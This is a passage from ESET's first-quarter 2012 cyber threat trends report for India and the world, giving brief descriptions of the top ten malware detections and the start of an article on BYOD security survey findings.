ESET India Cyber Threat Trends Report Q1

Embed Size (px)

DESCRIPTION

 

Text of ESET India Cyber Threat Trends Report Q1

ESET Cyber Threat Trend Report. India & Globe

Quarter I, 2012

Table of Contents

THE TOP TEN THREATS IN INDIA, QUARTER I, 2012 2

TOP THREATS (INDIA) IN BRIEF 3

THE TOP TEN THREATS (GLOBAL) 5

TOP THREATS (GLOBAL) IN BRIEF: 6

SIZING UP THE BYOD SECURITY CHALLENGE 8

WIN32/CARBERP GANG ON THE CARPET 10

CARBERP: THE RUSSIAN TROJAN BANKER NOW AIMS FACEBOOK USERS 11

FROM GEORGIA WITH LOVE: WIN32/GEORBOT INFORMATION STEALING TROJAN AND BOTNET 12

FAKE SUPPORT, AND NOW FAKE PRODUCT SUPPORT 13

SUPPORT SCAMMERS (MIS)USING INF AND PREFETCH 15

RECENT ESET PUBLICATIONS IN INDIA 17

ABOUT ESET 18

ADDITIONAL RESOURCES 18

The Top Ten Threats in India, Quarter I, 2012

TOP Threats (India) in brief:

1. INF/Autorun.gen.

A detection for 'autorun.inf' files that may be used by worms when

spreading to local, network, or removable drives.

When copying themselves to a drive, these worms also create a file

named 'autorun.inf' in the root of the targeted drive. The

'autorun.inf' file contains execution instructions for the operating

system which are invoked when the drive is viewed using Windows

Explorer, thus executing the copy of the worm.

2. HTML/ScrInject.B.Gen

Generic detection of HTML web pages containing script obfuscated or

iframe tags that that automatically redirect to the malware

download.

3. Win32/Sality

Sality is a polymorphic file infector. When run starts a service and

create/delete registry keys related with security activities in the

system and to ensure the start of malicious process each reboot of

operating system.

It modifies EXE and SCR files and disables services and process

related to security solutions.

More information relating to a specific signature:

http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality

_am_sality_ah

4. Win32/Ramnit.A.

Win32/Ramnit.A is a file infector. Files are infected by adding a new

section that contains the virus. The virus acquires data and

commands from a remote computer or the Internet. It can execute

the following operations: capture screenshots, send gathered

information, download files from a remote computer and/or the

Internet, run executable files, shut down/restart the computer.

5. LNK/Autostart.A

Exploit:Win32/CplLnk.A is a generic detection for specially-crafted,

malicious shortcut files that exploit the vulnerability that is currently

exploited by the Win32/Stuxnet family. When a user browses a folder

that contains the malicious shortcut using an application that displays

shortcut icons, the malware runs instead.

6. INF/Autorun

This detection label is used to describe a variety of malware using the

file autorun.inf as a way of compromising a PC. This file contains

information on programs meant to run automatically when

removable media

(often USB flash drives and similar devices) are accessed by a

Windows PC user. ESET security software heuristically identifies

malware that installs or modifies autorun.inf files as INF/Autorun

unless it is identified as a member of a specific malware family.

7. HTML/Iframe.B

Virus . HTML/Iframe.B is generic detection of malicious IFRAME tags

embedded in HTML pages, which redirect the browser to a specific

URL location with malicious software.

8. Win32/Autoit

Win32/Autoit is a worm that spreads via removable media, and some

of it variants spread also thru MSN. It may arrive on a system as a

downloaded file from a malicious Web site. It may also be dropped

by another malware. After infecting a system, it searches for all the

executable files and replace them with a copy of itself. It copies to

local disks and network resources. Once executed it downloads

additional threats or variants of itself.

9. Win32/Toolbar.Babylon

This class of threats ESET classifies as OUA (Potentially unwanted

application). A potentially unwanted application is a program that

contains adware, installs toolbars or has other unclear objectives. There

are some situations where a user may feel that the benefits of a

potentially unwanted application outweigh the risks. For this reason,

ESET assigns them a lower-risk category compared to other types of

malicious software, such as trojan horses or worms. While installing

your ESET security software, you can decide whether to enable

detection of potentially unwanted applications.

10. Win32/Virut.NBP

Win32/Virut.NBP is a polymorphic file infector. The virus connects to

the IRC network. It can be controlled remotely. The virus searches for

executables with one of the following extensions: .exe, .scr.

Executables are infected by appending the code of the virus to the

last section. The host file is modified in a way that causes the virus to

be executed prior to running the original code.

2. The Top Ten Threats (Global) (March 2012)

TOP Threats (Global) in brief:

1. HTML/ScrInject.B (see above)

2. INF/Autorun (see above)

3. HTML/Iframe.B

HTML/Iframe.B is generic detection of malicious IFRAME tags

embedded in HTML pages, which redirect the browser to a specific URL

location with malicious software.

4. Win32/Conficker

The Win32/Conficker threat is a network worm originally propagated

by exploiting a recent vulnerability in the Windows operating system.

This vulnerability is present in the RPC sub-system and can be remotely

exploited by an attacker without valid user credentials. Depending on

the variant, it may also spread via unsecured shared folders and by

removable media, making use of the Autorun facility enabled at

present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat

contacts web servers with pre-computed domain names to download

additional malicious components. Fuller descriptions of Conficker

variants are available at

http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

5. JS/Agent

The trojan displays dialogs that ask the user to purchase a specific

product/service. After purchasing the product/service, the malware

removes itself from the computer. Trojan is probably a part of other

malware.

6. JS/Iframe.AS

JS/Iframe.AS is a trojan that redirects the browser to a specific URL

location with malicious software. The program code of the malware is

usually embedded in HTML pages.

7. Win32/Sirefef

Win32/Sirefef.A is a trojan that redirects results of online search

engines to web sites that contain adware.

8. Win32/Sality (see above)

9. Win32/Dorkbot

Win32/Dorkbot.A is a worm that spreads via removable media. The

worm contains a backdoor. It can be controlled remotely. The file is

run-time compressed using UPX.

The worm collects login user names and passwords when the user

browses certain web sites. Then, it attempts to send gathered

information to a remote machine. This kind of worm can be controlled

remotely.

10. JS/Redirector

JS/Redirector is a trojan that redirects the browser to a specific URL

location with malicious software. The program code of the malware is

usually embedded in HTML pages.

Threats India vs Globe (January, Febryary, March 2012)

Sizing Up the BYOD Security Challenge

Stephen Cobb, ESET Security Evangelist

On the plus side of BYOD known you may get more work

from people when they can work in more places and at more times

of the day (from the breakfast table in the morning to the kitchen

table at night and the coffee shop in between). There can be cost

savings too: equipment outlays can be reduced if employees use

their own devices instead of the company buying them.

At the same time, IT security managers must weigh those

benefits against the security risks that come with these devices,

plus the cost of bringing them into line with existing security

policies and compliance standards. For example, what are the legal

ramifications of an employees personal laptop going missing when

it contains your customer list or sensitive internal

correspondence? To help companies get a handle on the scale and

scope of these risks, ESET engaged Harris Interactive to survey

some 1,300 adults in America who are currently employed. We

found more than 80 percent of them use some kind of personally

owned electronic device for work-related functions. Many of

these devices are older technologies like laptop and desktop

computers, but smartphones and tablets are already a significant

part of the BYOD phenomenon.

Unfortunately, the survey paints a worrying picture of security

on these devices; for example, encryption of company data is only

happening on about one third of them. One third of those

surveyed responded that company data is not encrypted when it is